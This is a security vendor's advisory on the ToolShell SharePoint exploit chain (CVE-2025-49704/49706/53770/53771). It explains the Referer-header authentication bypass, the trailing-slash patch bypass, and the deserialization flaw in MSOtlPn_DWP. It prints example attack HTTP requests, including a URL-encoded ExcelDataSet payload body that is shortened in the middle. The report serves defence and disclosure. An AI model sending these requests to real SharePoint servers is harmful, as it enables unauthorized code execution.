This vulnerability is an authentication bypass and insecure deserialization flaw in Microsoft SharePoint Server.
An attacker could bypass authentication and execute malicious code by sending a crafted Referer header and serialized XML data to the ToolPane.aspx page.
This issue was patched in the July security update for Microsoft SharePoint Server, and our AIWAF product will address it with the “Microsoft SharePoint Remote Code Execution” pattern,
which will be included in the August 2025 pattern update.
1. Overview
Microsoft SharePoint Server is an enterprise service for in-house content management, collaboration, and information sharing.
This report summarizes the analysis of ToolShell, a recently discovered authentication bypass and deserialization-based RCE vulnerability in the service
(CVE-2025-49704, CVE-2025-49706, CVE-2025-53770, CVE-2025-53771).
Source : https://www.logpoint.com/en/blog/toolshell-when-sharepoint-becomes-a-gateway-to-rce/
2. Attack Type
ToolShell was demonstrated at the Pwn2Own event in May 2025 as an exploit chain combining CVE-2025-49704 (an insecure deserialization vulnerability) and
CVE-2025-49706 (an authentication bypass vulnerability).
The authentication bypass vulnerability CVE-2025-49706 occurs in the ToolPane.aspx page, which handles critical logic.
Attackers discovered that if the Referer header contained logout page URLs such as /_layouts/SignOut.aspx, /_layouts/14/SignOut.aspx, or /_layouts/15/SignOut.aspx,
the authentication checks could be bypassed, allowing unauthorized access to ToolPane.aspx.
Example Attack Request:
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7939
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
Microsoft released a patch in July 2025 to address this vulnerability, but shortly afterward, CVE-2025-53771 was discovered as a bypass, and exploitation cases quickly followed. This bypass worked by appending a forward slash (/) after the ToolPane.aspx path, circumventing the patch.
Example Attack Request:
POST /_layouts/15/ToolPane.aspx/?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7939
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
The second vulnerability in the chain, CVE-2025-49704, is an insecure deserialization issue in the MSOtlPn_DWP parameter, which accepts serialized commands for ToolPane.aspx page controls. Attackers could send Base64-decoded malicious serialized XML code to this parameter for execution.
Although Microsoft issued a patch in early July 2025, it failed to fully address the underlying issue. As a result, CVE-2025-53770 was identified as a related flaw chained with CVE-2025-53771, and active exploitation was observed.
Example Attack Request (CVE-2025-53771 + CVE-2025-53770):
POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 7939
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Referer: /_layouts/SignOut.aspx
MSOTlPn_Uri%3Dhttps%3A%2F%2Ftarget%2F_controltemplates%2F15%2FAclEditor.ascx%26MSOTlPn_DWP%3D%0A++++%3C%25%40+Register+Tagprefix%3D%22Scorecard%22+Namespace%3D%22Microsoft.PerformancePoint.Scorecards%22+Assembly%3D%22Microsoft.PerformancePoint.Scorecards.Client%2C+Version%3D16.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D71e9bce111e9429c%22+%25%3E%0A++++%3C%25%40+Register+Tagprefix%3D%22asp%22+Namespace%3D%22System.Web.UI%22+Assembly%3D%22System.Web.Extensions%2C+Version%3D4.0.0.0%2C+Culture%3Dneutral%2C+PublicKeyToken%3D31bf3856ad364e35%22+%25%3E%0A%0A%3Casp%3AUpdateProgress+ID%3D%22UpdateProgress1%22+DisplayAfter%3D%2210%22+%0Arunat%3D%22server%22+AssociatedUpdatePanelID%3D%22upTest%22%3E%0A%3CProgressTemplate%3E%0A++%3Cdiv+class%3D%22divWaiting%22%3E++++++++++++%0A++++%3CScorecard%3AExcelDataSet+CompressedDataTable%3D%22H4sIA...Hv%2F%2FI%2FufAsz%2FlDAAA%3D%22+DataTable-CaseSensitive%3D%22false%22+runat%3D%22server%22%3E%0A%3C%2FScorecard%3AExcelDataSet%3E%0A++%3C%2Fdiv%3E%0A%3C%2FProgressTemplate%3E%0A%3C%2Fasp%3AUpdateProgress%3E%0A++++
Source : https://github.com/kaizensecurity/CVE-2025-53770 
3. Mitigation
On July 8, 2025, Microsoft released patches addressing CVE-2025-49704 and CVE-2025-49706. On July 19, 2025, further patches were issued for the actively exploited CVE-2025-53770 and CVE-2025-53771.
These vulnerabilities affect Microsoft SharePoint Server Subscription Edition, SharePoint Server 2019, and SharePoint Server 2016.
Users of these products must verify and apply the latest security updates immediately.
Our AIWAF product will address this threat with the new “Microsoft SharePoint Remote Code Execution” pattern, included in the August 2025 pattern update.
4. Conclusion
Microsoft SharePoint Server is a widely used collaboration platform across enterprises worldwide.
The vulnerabilities disclosed are relatively straightforward to exploit, and related information is already publicly available.
Furthermore, CISA confirmed exploitation activity and added these CVEs to the KEV catalog immediately after patch releases, underscoring the high risk.
Organizations using Microsoft SharePoint Server must promptly update to the latest versions.
Our Threat Analysis team will continue monitoring vulnerabilities related to Microsoft SharePoint Server and respond rapidly to newly discovered issues.
